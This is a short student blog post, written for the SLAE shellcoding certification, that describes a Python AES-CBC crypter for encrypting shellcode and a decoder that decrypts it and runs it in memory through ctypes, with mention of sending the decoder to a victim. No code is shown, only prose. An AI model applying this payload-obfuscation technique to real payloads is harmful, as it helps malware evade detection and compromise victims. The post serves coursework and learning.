0x07 SLAE - Custom Crypter
Introduction
In this last assessment, the goal is to develop our own crypter using a known encryption scheme in any language. I decided to do it in python because it is pretty straight forward. The algorithm encryption that I choosed is AES which stand for Advanced Encryption Standard. The mode that I use is Cipher Block Chaining. The CBC mode will xor each block of plaintext with the previous ciphertext block before being encrypted. Here is a good illustration of the encryption algorithm pattern :
Crypter
The following code is the crypter which will encrypt the original shellcode with the key that is specified in the script as you can see below.
By running this script, it will output the encrypted base64 shellcode that we can put in the payload or the decoder. Normally, the decoder is the payload that we send to the victim. Also, attacker will send a compiled version of it because it easier to execute. For the purpose of this assignment, I will not convert the python script in a compiled version.
Decoder
The decoder script take the encrypted shellcode as input and decrypt it with the same key that we passed in the crypter. Once the shellcode has been decrypted, we use the ctypes libraries to run the shellcode in memory.
Conlusion
The x86 Assembly Language and Shellcoding On Linux teach me a lot of thing. I started from little knowledge in shellcoding to something that is more familiar to me. I have still a lot of thing to learn and this is why I won't stop my journey here. Next step would probably be SLAE x64 and maybe OSCE. I suggest anyone to take that course if they would like to learn more about assembly and shellcode. Thanks to Vivek Ramachandran for the great course and sharing his knowledge to the world.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1374
Last updated
Was this helpful?